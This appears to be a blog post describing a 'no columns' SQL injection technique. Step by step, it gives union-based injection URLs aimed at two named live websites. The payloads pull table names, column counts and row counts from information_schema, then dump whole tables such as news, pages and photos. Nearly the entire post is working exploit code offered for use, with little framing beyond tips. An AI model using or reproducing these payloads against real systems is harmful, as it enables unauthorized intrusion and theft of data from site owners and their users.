i thought of something.
basically, we dont need to know the column names (username, password, id etc), we just need to know the column count.
therefore the dios part (table : column, table : column) is unnecessary.
instead of it, we will make a different query, for "table : column count".
Code:
http://mathman.dreamhosters.com/MathMan/Organization.php?id=7
and 0 union select 1,2,concat_ws(@:=0x0,(select''from (SELECT
1`A`,null`B`,null`C`,4`D`,5`E`,6`F`,7`G`,8`H`,9`I`,10`J`,11`K`,12`L`,13`M`,14`N`
,15`O`,16`P`,17`Q`,18`R`,19`S`,20`T`,21`U` UNION SELECT * FROM
information_schema 0.e.tables)q where
b!='information_schema'and@:=concat (@,concat_ws(0x203a20,c,(select
count(d) from (SELECT
1`A`,2`B`,3`C`,4`D`,5`E`,6`F`,7`G`,8`H`,9`I`,10`J`,11`K`,12`L`,13`M`,14`N`,15`O`
,16`P`,17`Q`,18`R`,19`S`,20`T` UNION SELECT * FROM
information_schema.columns)x where c=q.c)),0x3c62723e)),@),4,5,6,7,8,9we can also improve it, and pull out the table rows, to know which tables we should ignore.
Code:
http://mathman.dreamhosters.com/MathMan/Organization.php?id=7
and 0 union select 1,2,concat_ws(@:=0x0,(select''from (SELECT
1`A`,null`B`,null`C`,4`D`,5`E`,6`F`,7`G`,8`H`,9`I`,10`J`,11`K`,12`L`,13`M`,14`N`
,15`O`,16`P`,17`Q`,18`R`,19`S`,20`T`,21`U` UNION SELECT * FROM
information_schema 0.e.tables)q where
b!='information_schema'and@:=concat
(@,b,0x2e,c,0x3c62723e632e63203a20,(select count(d) from (SELECT
1`A`,null`B`,null`C`,null`D`,5`E`,6`F`,7`G`,8`H`,9`I`,10`J`,11`K`,12`L`,13`M`,14
`N`,15`O`,16`P`,17`Q`,18`R`,19`S`,20`T` UNION SELECT * FROM
information_schema.columns)x where
c=q.c),0x3c62723e726f7773203a20,h,0x3c62723e3c62723e)),@),4,5,6,7,8,9db.table
c.c - column count
rows - table rows.
im getting to like this "no columns injection" - noc injection.
another example.
step 1-
Code:
http://www.icdcprague.org/index.php?id=10' and 0 union select 1,2,3,4,5,6-- -step 2-
Code:
http://www.icdcprague.org/index.php?id=10'
and 0 union select 1,2,3,concat_ws(@:=0x0,(select''from (SELECT
1`A`,null`B`,null`C`,4`D`,5`E`,6`F`,7`G`,8`H`,9`I`,10`J`,11`K`,12`L`,13`M`,14`N`
,15`O`,16`P`,17`Q`,18`R`,19`S`,20`T`,21`U` UNION SELECT * FROM
information_schema 0.e.tables)q where
b!='information_schema'and@:=concat (@,c,0x3c62723e632e63203a20,(select
count(d) from (SELECT
1`A`,null`B`,null`C`,null`D`,5`E`,6`F`,7`G`,8`H`,9`I`,10`J`,11`K`,12`L`,13`M`,14
`N`,15`O`,16`P`,17`Q`,18`R`,19`S` UNION SELECT * FROM
information_schema.columns)x where
c=q.c),0x3c62723e726f7773203a20,h,0x3c62723e3c62723e)),@),5,6-- -step 3-
Code:
http://www.icdcprague.org/index.php?id=10'
and 0 union select 1,2,3,concat_ws(@:=0x0,(select''from (SELECT
null`A`,null`B`,null`C`,null`D`,null`E`,null`F`,null`G`,null`H`,null`I`,null`J`,
null`K` union select * from news union select * from prison union
select *,null from photos union select *,null,null,null,null,null,null
from flags union select *,null,null,null,null,null,null,null,null,null
from forma union select *,null,null,null,null,null,null,null,null from
gallery union select *,null,null,null,null,null from pages union select
*,null,null,null,null,null,null,null,null,null from stat union select
*,null,null,null,null,null,null,null,null,null from test union select
*,null,null,null,null,null,null,null,null,null from tree)q
where@:=concat
(@,concat_ws(0x203a20,a,b,c,d,e,f,g,h,i,j,k),0x3c62723e)),@),5,6-- -be sure to avoid hf copy-paste bug.
0 comments:
Post a Comment